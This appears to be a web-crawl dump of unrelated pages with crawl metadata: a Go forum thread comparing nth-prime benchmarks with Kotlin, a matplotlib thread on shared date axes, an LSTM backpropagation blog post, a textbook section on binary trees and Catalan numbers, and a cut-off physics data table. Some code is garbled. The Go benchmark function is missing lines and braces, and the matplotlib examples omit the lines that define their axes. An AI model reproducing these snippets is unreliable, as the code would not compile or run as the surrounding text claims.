#4\n\nIn this case you have to share some more details about how you actually performed the benchmarks.\n\nJust as a side note, it can be pretty hard to get a meaningful comparison of the same algorithm in two different programming languages. It all depends on what exactly is measured, how many runs of the function under tests are executed (e.g. are CPU caches cold or warm), etc.\n\n(Luke Bullard) #5\n\nI ran the comparison tests on a private server, with an Intel XEON-E3-1270-V3-Haswell 3.5GHz processor and 2x 4GB Kingston 4GB DDR3 1Rx8. I had swap disabled, and I ran tests of several thousand iterations. For each iteration, I slept for a second in between each run. I timed the functions simply by wrapping the function around calls to `nanoTime` and calculating the difference, which I’m aware could be flawed but regardless, don’t think it could account for the difference I noted. No CPU intensive background processes were running (~100% Idle)\n\nMy results:\n\n-With `n=100`,\n\n• Go: ~600,000ns per iteration\n• Kotlin: ~300,000ns per iteration\n-With `n=1000`\n• Go: ~50,000,000ns per iteration\n• Kotlin: ~25,000,000ns per iteration\n\nOther performance tests I did suggested Go performed better than Kotlin (Bubble sort, String -> Hashmap), but I guess I was mainly wondering if there was something I was doing fundamentally wrong, or if Go struggles in performance in certain scenarios such as this.\n\n(Lucas Bremgartner) #6\n\nWith my dated notebook (with Intel® Core™ i5-6200U CPU @ 2.30GHz, not idle at all) and the following benchmark:\n\n``````package nthprime\n\nimport \"testing\"\n\nvar result int\n\nfunc getNthPrime(num int) int {\ncurrNum := 1\ncurrNum++\nisPrime := true\nfor i := 2; i < currNum / 2; i++ {\nif currNum%i == 0 {\nisPrime = false\nbreak\n}\n}\nif isPrime {\n}\n}\n}\n\nfunc BenchmarkNthPrime(b *testing.B) {\nvar r int\nfor i := 0; i < b.N; i++ {\nr = getNthPrime(100)\n}\nresult = r\n}\n``````\n\nI get the following results:\n\n``````\\$ go test -bench=. .\ngoos: linux\ngoarch: amd64\npkg: nthprime\nBenchmarkNthPrime-4 10000 151375 ns/op\nPASS\nok nthprime 1.532s\n``````\n\nBased on the CPU comparison at cpu.userbenchmark.com the Intel XEON is way better and still I get the better numbers per operation with my test on my laptop (~150000 ns/op).\n\n(Karl Benedict) #7\n\nthe algorithm thinks that 4 is a prime number?..", null, "(Luke Bullard) #8\n\nSo, if I run a Go benchmark, I get `~100,000ns` per iteration.\n\n``````goos: linux\ngoarch: amd64\nBenchmarkNthPrime-8 \t 10000\t 104896 ns/op\nPASS\n``````\n\nIf I run the Kotlin function using a Kotlin benchmark, I get `~40,000ns` per iteration.\n\nThe original test I had done involved reading input being fed in from another server, which fired a query every second, and then I averaged out all of the iterations. I’m guessing the difference is in regards to the test method?\n\nRegardless, the difference still exists. I’m assuming that in this specific scenario, Kotlin outperforms Go. I guess I’m just surprised there’s a significant difference for such a simple/common scenario.\n\n(Luke Bullard) #9\n\nuhhh are you implying it isn’t?", null, "Good thing I’m not using this code for anything", null, "(Karl Benedict) #10\n\nonly a little bit", null, "This code should do a little better I think.\n\n``````package main\n\nimport \"fmt\"\n\n// IsPrime ...\nfunc IsPrime(n int) bool {\nswitch {\ncase n == 2:\nreturn true\ncase n < 2 || n%2 == 0:\nreturn false\n\ndefault:\nfor i := 3; i*i <= n; i += 2 {\nif n%i == 0 {\nreturn false\n}\n}\n}\nreturn true\n}\n\nfunc getNthPrime(n int) int {\nvar result int = 2\nfor {\n\nif IsPrime(result) {\nn--\n}\n\nif n == 0 {\nreturn result\n}\n\nresult++\n}\n}\n\nfunc main() {\nfmt.Println(getNthPrime(100))\n}``````" ]
[ null, "https://forum.golangbridge.org/uploads/default/original/2X/b/b7c7c811a309cce5ab951588d4302faaa96553b5.png", null, "https://forum.golangbridge.org/images/emoji/google/slight_smile.png", null, "https://forum.golangbridge.org/images/emoji/google/thinking.png", null, "https://forum.golangbridge.org/images/emoji/google/sweat_smile.png", null, "https://forum.golangbridge.org/images/emoji/google/slight_smile.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8502381,"math_prob":0.8389281,"size":1241,"snap":"2019-51-2020-05","text_gpt3_token_len":357,"char_repetition_ratio":0.1293452,"word_repetition_ratio":0.041666668,"special_character_ratio":0.29170024,"punctuation_ratio":0.1092437,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9538429,"pos_list":[0,1,2,3,4,5,6,7,8,9,10],"im_url_duplicate_count":[null,null,null,null,null,1,null,3,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-21T02:45:18Z\",\"WARC-Record-ID\":\"<urn:uuid:ce96caee-edfe-4298-9ad8-4f726f1f248b>\",\"Content-Length\":\"22295\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:68f3d97d-6e2a-4487-9d62-1d2f5b4e5a74>\",\"WARC-Concurrent-To\":\"<urn:uuid:9cff3446-1359-4af1-b54a-ba2cee06a247>\",\"WARC-IP-Address\":\"130.211.158.196\",\"WARC-Target-URI\":\"https://forum.golangbridge.org/t/go-vs-kotlin-performance-nth-prime-calculation/17022\",\"WARC-Payload-Digest\":\"sha1:GYOP4XRCUVICFHZLZWWSMOLSZT3EOEO4\",\"WARC-Block-Digest\":\"sha1:3LRLTOOGARMOT2DYECZDBURG7CUI5DRD\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579250601241.42_warc_CC-MAIN-20200121014531-20200121043531-00421.warc.gz\"}"}
https://discourse.matplotlib.org/t/plot-date-again/16556
[ "# plot_date again\n\nHi,\n\nIs it possible to force the date ticks to be the same in two different\nplots? For example, the attached figures cover the same time spans but\nin one, the data are weekly and the other, monthly. While there is\nnothing really wrong with different tick marks, aesthetically it would\nbe nice if they were both the same.\n\nThanks,\nTed\n\nYes, just use the “sharex” keyword to share the x-axis between the two. Not only will they have the same ticks and labels, but when you pan and zoom in one the other moves with it. The example below does not use dates, but it will work with dates just the same.\n\nimport matplotlib.pyplot as plt\n\nimport numpy as np\n\nfig1 = plt.figure(1)\n\nax1.plot(np.random.randn(10,2)*10)\n\nfig2 = plt.figure(2)\n\nax2.plot(np.random.randn(10,2)*10)\n\nplt.show()\n\nJDH\n\n···\n\nOn Wed, Feb 8, 2012 at 1:12 PM, Ted To <rainexpected@…3956…> wrote:\n\nIs it possible to force the date ticks to be the same in two different\n\nplots? For example, the attached figures cover the same time spans but\n\nin one, the data are weekly and the other, monthly. While there is\n\nnothing really wrong with different tick marks, aesthetically it would\n\nbe nice if they were both the same.\n\nThanks again, worked like a charm!\n\nCheers,\nTed\n\n···\n\nOn 02/08/2012 02:22 PM, John Hunter wrote:\n\nOn Wed, Feb 8, 2012 at 1:12 PM, Ted To <rainexpected@…3956… > <mailto:rainexpected@…3956…>> wrote:\n\nIs it possible to force the date ticks to be the same in two different\nplots? For example, the attached figures cover the same time spans but\nin one, the data are weekly and the other, monthly. While there is\nnothing really wrong with different tick marks, aesthetically it would\nbe nice if they were both the same.\n\nYes, just use the \"sharex\" keyword to share the x-axis between the two.\nNot only will they have the same ticks and labels, but when you pan and\nzoom in one the other moves with it. The example below does not use\ndates, but it will work with dates just the same.\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfig1 = plt.figure(1)" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8921577,"math_prob":0.87903374,"size":1903,"snap":"2022-05-2022-21","text_gpt3_token_len":498,"char_repetition_ratio":0.12216956,"word_repetition_ratio":0.85276073,"special_character_ratio":0.2601156,"punctuation_ratio":0.14148681,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95074785,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-21T17:52:00Z\",\"WARC-Record-ID\":\"<urn:uuid:35eccdac-94f5-41de-a4d9-285c7b90ebc2>\",\"Content-Length\":\"21059\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:38f0bed6-e411-4d4c-a213-1653a012bda0>\",\"WARC-Concurrent-To\":\"<urn:uuid:59632e29-874c-411f-82ce-afa355f9aeae>\",\"WARC-IP-Address\":\"165.22.13.220\",\"WARC-Target-URI\":\"https://discourse.matplotlib.org/t/plot-date-again/16556\",\"WARC-Payload-Digest\":\"sha1:MBTDNQSNOG3OIFG3OH2UKBX3KRPGIJNF\",\"WARC-Block-Digest\":\"sha1:Q2QQLSYCSAPE4A26F3UF2PV462U2OWJC\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662540268.46_warc_CC-MAIN-20220521174536-20220521204536-00116.warc.gz\"}"}
http://datasciencehack.com/blog/2020/09/30/back-propagation-of-lstm/
[ "# Back propagation of LSTM: just get ready for the most tiresome part\n\nIn this article I will just give you some tips to get ready for the most tiresome part of understanding LSTM.\n\n### 1, Chain rules\n\nIn fact this article is virtually an article on chain rules of differentiation. Even if you have clear understandings on chain rules, I recommend you to take a look at this section. If you have written down all the equations of back propagation of DCL, you would have seen what chain rules are. Even simple chain rules for backprop of normal DCL can be difficult to some people, but when it comes to backprop of LSTM, it is a monster of chain rules. I think using graphical models would help you understand what chain rules are like. Graphical models are basically used to describe the relations  of variables and functions in probabilistic models, so to be exact I am going to use “something like graphical models” in this article. Not that this is a common way to explain chain rules.\n\nFirst, let’s think about the simplest type of chain rule. Assume that you have a function $f=f(x)=f(x(y))$, and relations of the functions are displayed as the graphical model at the left side of the figure below. Variables are a type of function, so you should think that every node in graphical models denotes a function. Arrows in purple in the right side of the chart show how information propagate in differentiation.", null, "Next, if you a function $f$ , which has two variances  $x_1$ and $x_2$. And both of the variances also share two variances  $y_1$ and $y_2$. When you take partial differentiation of $f$ with respect to $y_1$ or $y_2$, the formula is a little tricky. Let’s think about how to calculate $\\frac{\\partial f}{\\partial y_1}$. The variance $y_1$ propagates to $f$ via $x_1$ and $x_2$. In this case the partial differentiation has two terms as below.", null, "In chain rules, you have to think about all the routes where a variance can propagate through. If you generalize chain rules, that is like below, and you need to understand chain rules in this way to understanding any types of back propagation.", null, "The figure above shows that if you calculate partial differentiation of $f$ with respect to $y_i$, the partial differentiation has $n$ terms in total because $y_i$ propagates to $f$ via $n$ variances.\n\n### 2, Chain rules in LSTM\n\nI would like you to remember the figure I used to show how errors propagate backward during backprop of simple RNNs. The errors at the last time step propagates only at the last time step.", null, "At RNN block level, the flows of errors are the same in LSTM backprop, but the flow of errors in each block is much more complicated in LSTM backprop.\n\n###", null, "", null, "", null, "", null, "", null, "", null, "3, How LSTMs tackle exploding/vanishing gradients problems\n\n### Yasuto Tamura", null, "Data Science Intern at DATANOMIQ. Majoring in computer science. Currently studying mathematical sides of deep learning, such as densely connected layers, CNN, RNN, autoencoders, and making study materials on them. Also started aiming at Bayesian deep learning algorithms.\n\n0 replies" ]
[ null, "https://data-science-blog.com/wp-content/uploads/2020/09/chain_rule_1-1030x236.png", null, "https://data-science-blog.com/wp-content/uploads/2020/09/chain_rule_2-1030x340.png", null, "https://data-science-blog.com/wp-content/uploads/2020/09/chain_rule_3-1030x398.png", null, "https://data-science-blog.com/wp-content/uploads/2020/07/simple_rnn_backprop_flow_3-1030x744.png", null, "https://data-science-blog.com/wp-content/uploads/2020/09/lstm_backprop_6-1030x303.png", null, "https://data-science-blog.com/wp-content/uploads/2020/09/lstm_backprop_5-1030x614.png", null, "https://data-science-blog.com/wp-content/uploads/2020/09/lstm_backprop_4-1030x614.png", null, "https://data-science-blog.com/wp-content/uploads/2020/09/lstm_backprop_3-1030x566.png", null, "https://data-science-blog.com/wp-content/uploads/2020/09/lstm_backprop_2-1030x302.png", null, "https://data-science-blog.com/wp-content/uploads/2020/09/lstm_backprop_1-1030x612.png", null, "http://datasciencehack.com/wp-content/uploads/2020/03/index-80x80.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9370835,"math_prob":0.9714651,"size":3496,"snap":"2022-40-2023-06","text_gpt3_token_len":778,"char_repetition_ratio":0.11340206,"word_repetition_ratio":0.02020202,"special_character_ratio":0.21710527,"punctuation_ratio":0.09552239,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9984733,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22],"im_url_duplicate_count":[null,4,null,4,null,4,null,7,null,4,null,4,null,4,null,4,null,4,null,4,null,9,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-02-04T21:38:47Z\",\"WARC-Record-ID\":\"<urn:uuid:066422c7-fdf7-4c45-814b-db610ce16981>\",\"Content-Length\":\"107799\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d4abf8b2-c8e1-4062-bf4e-5651ef951477>\",\"WARC-Concurrent-To\":\"<urn:uuid:320c5781-06a6-4cc5-b211-52e79d83e3c4>\",\"WARC-IP-Address\":\"85.25.214.207\",\"WARC-Target-URI\":\"http://datasciencehack.com/blog/2020/09/30/back-propagation-of-lstm/\",\"WARC-Payload-Digest\":\"sha1:MURQIIKPEGUY5PGGMV4VVZNH3KA3OPJS\",\"WARC-Block-Digest\":\"sha1:HOFIVCMMRG5BYOX62FUX3HWUYW23SQXP\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764500154.33_warc_CC-MAIN-20230204205328-20230204235328-00844.warc.gz\"}"}
https://faculty.uml.edu/klevasseur/ads/s-binary-trees.html
[ "", null, "# Applied Discrete Structures\n\n## Section10.4Binary Trees\n\n### Subsection10.4.1Definition of a Binary Tree\n\nAn ordered rooted tree is a rooted tree whose subtrees are put into a definite order and are, themselves, ordered rooted trees. An empty tree and a single vertex with no descendants (no subtrees) are ordered rooted trees.\nThe trees in Figure 10.4.2 are identical rooted trees, with root 1, but as ordered trees, they are different.\nIf a tree rooted at $$v$$ has $$p$$ subtrees, we would refer to them as the first, second,..., $$p^{th}$$ subtrees. There is a subtle difference between certain ordered trees and binary trees, which we define next.\n\n#### Definition10.4.3.Binary Tree.\n\n1. A tree consisting of no vertices (the empty tree) is a binary tree\n2. A vertex together with two subtrees that are both binary trees is a binary tree. The subtrees are called the left and right subtrees of the binary tree.\nThe difference between binary trees and ordered trees is that every vertex of a binary tree has exactly two subtrees (one or both of which may be empty), while a vertex of an ordered tree may have any number of subtrees. But there is another significant difference between the two types of structures. The two trees in Figure 10.4.4 would be considered identical as ordered trees. However, they are different binary trees. Tree (a) has an empty right subtree and Tree (b) has an empty left subtree.\n\n### Subsection10.4.2Traversals of Binary Trees\n\nThe traversal of a binary tree consists of visiting each vertex of the tree in some prescribed order. Unlike graph traversals, the consecutive vertices that are visited are not always connected with an edge. The most common binary tree traversals are differentiated by the order in which the root and its subtrees are visited. The three traversals are best described recursively and are:\nPreorder Traversal:\n1. Visit the root of the tree.\n2. Preorder traverse the left subtree.\n3. Preorder traverse the right subtree.\nInorder Traversal:\n1. Inorder traverse the left subtree.\n2. Visit the root of the tree.\n3. Inorder traverse the right subtree.\nPostorder Traversal:\n1. Postorder traverse the left subtree.\n2. Postorder traverse the right subtree.\n3. Visit the root of the tree.\nAny traversal of an empty tree consists of doing nothing.\nFor the tree in Figure 10.4.7, the orders in which the vertices are visited are:\n• A-B-D-E-C-F-G, for the preorder traversal.\n• D-B-E-A-F-C-G, for the inorder traversal.\n• D-E-B-F-G-C-A, for the postorder traversal.\nBinary Tree Sort. Given a collection of integers (or other objects than can be ordered), one technique for sorting is a binary tree sort. If the integers are $$a_1\\text{,}$$ $$a_2, \\ldots \\text{,}$$ $$a_n\\text{,}$$ $$n\\geq 1\\text{,}$$ we first execute the following algorithm that creates a binary tree:\nIf the integers to be sorted are 25, 17, 9, 20, 33, 13, and 30, then the tree that is created is the one in Figure 10.4.9. The inorder traversal of this tree is 9, 13, 17, 20, 25, 30, 33, the integers in ascending order. In general, the inorder traversal of the tree that is constructed in the algorithm above will produce a sorted list. The preorder and postorder traversals of the tree have no meaning here.\n\n### Subsection10.4.3Expression Trees\n\nA convenient way to visualize an algebraic expression is by its expression tree. Consider the expression\n\\begin{equation*} X = a*b - c/d + e. \\end{equation*}\nSince it is customary to put a precedence on multiplication/divisions, $$X$$ is evaluated as $$((a*b) -(c/d)) + e\\text{.}$$ Consecutive multiplication/divisions or addition/subtractions are evaluated from left to right. We can analyze $$X$$ further by noting that it is the sum of two simpler expressions $$(a*b) - (c/d)$$ and $$e\\text{.}$$ The first of these expressions can be broken down further into the difference of the expressions $$a*b$$ and $$c/d\\text{.}$$ When we decompose any expression into $$(\\textrm{left expression})\\textrm{operation} (\\textrm{right expression})\\text{,}$$ the expression tree of that expression is the binary tree whose root contains the operation and whose left and right subtrees are the trees of the left and right expressions, respectively. Additionally, a simple variable or a number has an expression tree that is a single vertex containing the variable or number. The evolution of the expression tree for expression $$X$$ appears in Figure 10.4.10.\n1. If we intend to apply the addition and subtraction operations in $$X$$ first, we would parenthesize the expression to $$a*(b - c)/(d + e)\\text{.}$$ Its expression tree appears in Figure 10.4.12(a).\n2. The expression trees for $$a^2-b^2$$ and for $$(a + b)*(a - b)$$ appear in Figure 10.4.12(b) and Figure 10.4.12(c).\nThe three traversals of an operation tree are all significant. A binary operation applied to a pair of numbers can be written in three ways. One is the familiar infix form, such as $$a + b$$ for the sum of $$a$$ and $$b\\text{.}$$ Another form is prefix, in which the same sum is written $$+a b\\text{.}$$ The final form is postfix, in which the sum is written $$a b+\\text{.}$$ Algebraic expressions involving the four standard arithmetic operations $$(+,-,*, \\text{and} /)$$ in prefix and postfix form are defined as follows:\nThe connection between traversals of an expression tree and these forms is simple:\n1. The preorder traversal of an expression tree will result in the prefix form of the expression.\n2. The postorder traversal of an expression tree will result in the postfix form of the expression.\n3. The inorder traversal of an operation tree will not, in general, yield the proper infix form of the expression. If an expression requires parentheses in infix form, an inorder traversal of its expression tree has the effect of removing the parentheses.\nThe preorder traversal of the tree in Figure 10.4.10 is $$+-*ab/cd e\\text{,}$$ which is the prefix version of expression $$X\\text{.}$$ The postorder traversal is $$ab*cd/-e+\\text{.}$$ Note that since the original form of $$X$$ needed no parentheses, the inorder traversal, $$a*b-c/d+e\\text{,}$$ is the correct infix version.\n\n### Subsection10.4.4Counting Binary Trees\n\nWe close this section with a formula for the number of different binary trees with $$n$$ vertices. The formula is derived using generating functions. Although the complete details are beyond the scope of this text, we will supply an overview of the derivation in order to illustrate how generating functions are used in advanced combinatorics.\nLet $$B(n)$$ be the number of different binary trees of size $$n$$ ($$n$$ vertices), $$n \\geq 0\\text{.}$$ By our definition of a binary tree, $$B(0) = 1\\text{.}$$ Now consider any positive integer $$n + 1\\text{,}$$ $$n \\geq 0\\text{.}$$ A binary tree of size $$n + 1$$ has two subtrees, the sizes of which add up to $$n\\text{.}$$ The possibilities can be broken down into $$n + 1$$ cases:\nCase 0: Left subtree has size 0; right subtree has size $$n\\text{.}$$\nCase 1: Left subtree has size 1; right subtree has size $$n - 1\\text{.}$$\n$$\\quad \\quad$$$$\\vdots$$\nCase $$k\\text{:}$$ Left subtree has size $$k\\text{;}$$ right subtree has size $$n - k\\text{.}$$\n$$\\quad \\quad$$$$\\vdots$$\nCase $$n\\text{:}$$ Left subtree has size $$n\\text{;}$$ right subtree has size 0.\nIn the general Case $$k\\text{,}$$ we can count the number of possibilities by multiplying the number of ways that the left subtree can be filled, $$B(k)\\text{,}$$ by the number of ways that the right subtree can be filled. $$B(n-k)\\text{.}$$ Since the sum of these products equals $$B(n + 1)\\text{,}$$ we obtain the recurrence relation for $$n\\geq 0\\text{:}$$\n\\begin{equation*} \\begin{split} B(n+1) &= B(0)B(n)+ B(1)B(n-1)+ \\cdots + B(n)B(0)\\\\ &=\\sum_{k=0}^n B(k) B(n-k) \\end{split} \\end{equation*}\nNow take the generating function of both sides of this recurrence relation:\n\\begin{gather} \\sum_{n=0}^{\\infty } B(n+1) z^n= \\sum_{n=0}^{\\infty } \\left(\\sum_{k=0}^n B(k) B(n-k)\\right)z^n\\tag{10.4.1} \\end{gather}\nor\n\\begin{gather} G(B\\uparrow ; z) = G(B*B; z) = G(B; z) ^2\\tag{10.4.2} \\end{gather}\nRecall that $$G(B\\uparrow;z) =\\frac{G(B;z)-B(0)}{z}=\\frac{G(B;z)-1}{z}$$ If we abbreviate $$G(B; z)$$ to $$G\\text{,}$$ we get\n\\begin{equation*} \\frac{G-1}{z}= G^2 \\Rightarrow z G^2- G + 1 = 0 \\end{equation*}\nUsing the quadratic equation we find two solutions:\n\\begin{gather} G_1 = \\frac{1+\\sqrt{1-4 z}}{2z} \\textrm{ and}\\tag{10.4.3}\\\\ G_2 = \\frac{1-\\sqrt{1-4 z}}{2z}\\tag{10.4.4} \\end{gather}\nThe gap in our derivation occurs here since we don’t presume a knowledge of calculus. If we expand $$G_1$$ as an extended power series, we find\n\\begin{gather} G_1 = \\frac{1+\\sqrt{1-4 z}}{2z}=\\frac{1}{z}-1-z-2 z^2-5 z^3-14 z^4-42 z^5+\\cdots\\tag{10.4.5} \\end{gather}\nThe coefficients after the first one are all negative and there is a singularity at 0 because of the $$\\frac{1}{z}$$ term. However if we do the same with $$G_2$$ we get\n\\begin{gather} G_2= \\frac{1-\\sqrt{1-4 z}}{2z} = 1+z+2 z^2+5 z^3+14 z^4+42 z^5+\\cdots\\tag{10.4.6} \\end{gather}\nFurther analysis leads to a closed form expression for $$B(n)\\text{,}$$ which is\n\\begin{equation*} B(n) = \\frac{1}{n+1}\\left( \\begin{array}{c} 2n \\\\ n \\\\ \\end{array} \\right) \\end{equation*}\nThis sequence of numbers is often called the Catalan numbers. For more information on the Catalan numbers, see the entry A000108 in The On-Line Encyclopedia of Integer Sequences 1 .\n\n### Subsection10.4.5SageMath Note - Power Series\n\nIt may be of interest to note how the extended power series expansions of $$G_1$$ and $$G_2$$ are determined using Sage. In Sage, one has the capability of being very specific about how algebraic expressions should be interpreted by specifying the underlying ring. This can make working with various algebraic expressions a bit more confusing to the beginner. Here is how to get a Laurent expansion for $$G_1$$ above.\nR.<z>=PowerSeriesRing(ZZ,'z')\nG1=(1+sqrt(1-4*z))/(2*z)\nG1\n\nThe first Sage expression above declares a structure called a ring that contains power series. We are not using that whole structure, just a specific element, G1. So the important thing about this first input is that it establishes z as being a variable associated with power series over the integers. When the second expression defines the value of G1 in terms of z, it is automatically converted to a power series.\nThe expansion of $$G_2$$ uses identical code, and its coefficients are the values of $$B(n)\\text{.}$$\nR.<z>=PowerSeriesRing(ZZ,'z')\nG2=(1-sqrt(1-4*z))/(2*z)\nG2\n\nIn Chapter 16 we will introduce rings and will be able to take further advantage of Sage’s capabilities in this area.\n\n### Exercises10.4.6Exercises\n\n#### 1.\n\nDraw the expression trees for the following expressions:\n1. $$\\displaystyle a(b + c)$$\n2. $$\\displaystyle a b + c$$\n3. $$\\displaystyle a b + a c$$\n4. $$\\displaystyle b b - 4 a c$$\n5. $$\\displaystyle \\left(\\left(a_3 x + a_2\\right)x +a_1\\right)x + a_0$$\n\n#### 2.\n\nDraw the expression trees for\n1. $$\\displaystyle \\frac{x^2-1}{x-1}$$\n2. $$\\displaystyle x y + x z + y z$$\n\n#### 3.\n\nWrite out the preorder, inorder, and postorder traversals of the trees in Exercise 1 above.\n\\begin{equation*} \\begin{array}{cccc} & \\text{Preorder} & \\text{Inorder} & \\text{Postorder} \\\\ (a) & \\cdot a + b c & a\\cdot b+c & a b c + \\cdot \\\\ (b) & +\\cdot a b c & a\\cdot b+c & a b\\cdot c+ \\\\ (c) & +\\cdot a b\\cdot a c & a\\cdot b+a\\cdot c & a b\\cdot a c\\cdot + \\\\ \\end{array} \\end{equation*}\n\n#### 4.\n\nVerify the formula for $$B(n)\\text{,}$$ $$0 \\leq n \\leq 3$$ by drawing all binary trees with three or fewer vertices.\n\n#### 5.\n\n1. Draw a binary tree with seven vertices and only one leaf. Your answer won’t be unique. How many different possible answers are there?\n2. Draw a binary tree with seven vertices and as many leaves as possible.\nThere are $$2^6=64$$ different possible answers to part (a). The answer to (b) is unique.\n\n#### 6.\n\nProve that the maximum number of vertices at level $$k$$ of a binary tree is $$2^k$$ and that a tree with that many vertices at level $$k$$ must have $$2^{k+1}-1$$ vertices.\n\n#### 7.\n\nProve that if $$T$$ is a full binary tree, then the number of leaves of $$T$$ is one more than the number of internal vertices (non-leaves).\nSolution 1:\nBasis: A binary tree consisting of a single vertex, which is a leaf, satisfies the equation $$\\text{leaves} = \\textrm{internal vertices} + 1$$\nInduction:Assume that for some $$k\\geq 1\\text{,}$$ all full binary trees with $$k$$ or fewer vertices have one more leaf than internal vertices. Now consider any full binary tree with $$k+1$$ vertices. Let $$T_A$$ and $$T_B$$ be the left and right subtrees of the tree which, by the definition of a full binary tree, must both be full. If $$i_A$$ and $$i_B$$ are the numbers of internal vertices in $$T_A$$ and $$T_B\\text{,}$$ and $$j_A$$ and $$j_B$$ are the numbers of leaves, then $$j_A=i_A+1$$ and $$j_B=i_B+1\\text{.}$$ Therefore, in the whole tree,\n\\begin{equation*} \\begin{split} \\textrm{the number of leaves} & =j_A+j_B\\\\ &=\\left(i_A+1\\right)+\\left(i_B+1\\right)\\\\ &=\\left(i_A+i_B+1\\right)+1\\\\ &=(\\textrm{number of internal vertices})+1 \\end{split} \\end{equation*}\nSolution 2:\nImagine building a full binary tree starting with a single vertex. By continuing to add leaves in pairs so that the tree stays full, we can build any full binary tree. Our starting tree satisfies the condition that the number of leaves is one more than the number of internal vertices . By adding a pair of leaves to a full binary tree, an old leaf becomes an internal vertex, increasing the number of internal vertices by one. Although we lose a leaf, the two added leaves create a net increase of one leaf. Therefore, the desired equality is maintained.\n\n#### 8.\n\nThere is a one to one correspondence between ordered rooted trees and binary trees. If you start with an ordered rooted tree, $$T\\text{,}$$ you can build a binary tree $$B$$ with an empty right subtree by placing the the root of $$T$$ at the root of $$B\\text{.}$$ Then for every vertex $$v$$ from $$T$$ that has been placed in $$B\\text{,}$$ place it’s leftmost child (if there is one) as $$v$$’s left child in $$B\\text{.}$$ Make $$v$$’s next sibling (if there is one) in $$T$$ the right child in $$B\\text{.}$$", null, "Figure 10.4.18. An ordered rooted tree with root $$r\\text{.}$$\n1. Why will $$B$$ have no right children in this correspondence?\n1. The root of $$B$$ is the root of the corresponding ordered rooted tree, which as no siblings.\n4. The number of ordered rooted trees with $$n$$ vertices is equal to the number of binary trees with $$n-1$$ vertices, $$\\frac{1}{n} \\binom{2(n-1)}{n-1}$$\noeis.org" ]
[ null, "http://discretemath.org/images/ads_v3_cover.jpg", null, "https://faculty.uml.edu/klevasseur/ads/images/fig-ex-ordered-tree.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.84586364,"math_prob":0.9997869,"size":15540,"snap":"2023-40-2023-50","text_gpt3_token_len":4433,"char_repetition_ratio":0.16741762,"word_repetition_ratio":0.047829583,"special_character_ratio":0.30032176,"punctuation_ratio":0.10752,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.999984,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-11-28T09:09:14Z\",\"WARC-Record-ID\":\"<urn:uuid:14b72c27-b8ec-40dc-bf69-8ad390c830a4>\",\"Content-Length\":\"146725\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:23f77997-87fa-4a8c-9b98-abff6329f1e4>\",\"WARC-Concurrent-To\":\"<urn:uuid:06866278-5592-4af5-b8d5-377b3ce516d0>\",\"WARC-IP-Address\":\"129.63.91.88\",\"WARC-Target-URI\":\"https://faculty.uml.edu/klevasseur/ads/s-binary-trees.html\",\"WARC-Payload-Digest\":\"sha1:FPTF4FZULYJL7E3IWLAW572ZRNRIMURM\",\"WARC-Block-Digest\":\"sha1:JDTHOIATXIE45OTYZVLQ4DTWPUHYUBDL\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679099281.67_warc_CC-MAIN-20231128083443-20231128113443-00544.warc.gz\"}"}
http://pdglive.lbl.gov/DataBlock.action?node=S067DU1
[ "# R(${{\\boldsymbol \\nu}_{{\\mu}}}$) = (Measured Flux of ${{\\boldsymbol \\nu}_{{\\mu}}}$) $/$ (Expected Flux of ${{\\boldsymbol \\nu}_{{\\mu}}}$) INSPIRE search\n\nVALUE DOCUMENT ID TECN  COMMENT\n• • • We do not use the following data for averages, fits, limits, etc. • • •\n$0.84$ $\\pm0.12$ 1\n 2006\nMINS MINOS atmospheric\n$0.72$ $\\pm0.026$ $\\pm0.13$ 2\n 2001\nMCRO upward through-going\n$0.57$ $\\pm0.05$ $\\pm0.15$ 3\n 2000\nMCRO upgoing partially contained\n$0.71$ $\\pm0.05$ $\\pm0.19$ 4\n 2000\nMCRO downgoing partially contained + upgoing stopping\n$0.74$ $\\pm0.036$ $\\pm0.046$ 5\n 1998\nMCRO Streamer tubes\n6\n 1991\nIMB Water Cherenkov\n7\n 1989\nNUSX\n$0.95$ $\\pm0.22$ 8\n 1981\nBaksan\n$0.62$ $\\pm0.17$\n 1978\nCase Western/UCI\n1  ADAMSON 2006 uses a measurement of 107 total neutrinos compared to an expected rate of $127$ $\\pm13$ without oscillations.\n2  AMBROSIO 2001 result is based on the upward through-going muon tracks with $\\mathit E_{{{\\mathit \\mu}}}>1$ GeV. The data came from three different detector configurations, but the statistics is largely dominated by the full detector run, from May 1994 to December 2000. The total live time, normalized to the full detector configuration, is $6.17$ years. The first error is the statistical error, the second is the systematic error, dominated by the theoretical error in the predicted 